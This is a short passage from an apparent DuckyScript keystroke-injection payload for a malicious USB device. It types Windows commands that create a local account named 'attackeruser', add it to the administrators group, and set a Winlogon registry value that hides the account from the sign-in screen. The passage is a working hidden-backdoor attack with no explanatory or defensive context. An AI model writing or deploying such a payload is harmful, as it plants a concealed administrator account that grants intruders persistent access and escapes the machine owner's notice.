ENTER
STRING net user attackeruser attackerpass /add && net localgroup administrators attackeruser /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
ENTER
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attackeruser /t REG_DWORD /d 0 /f
ENTER
DELAY 300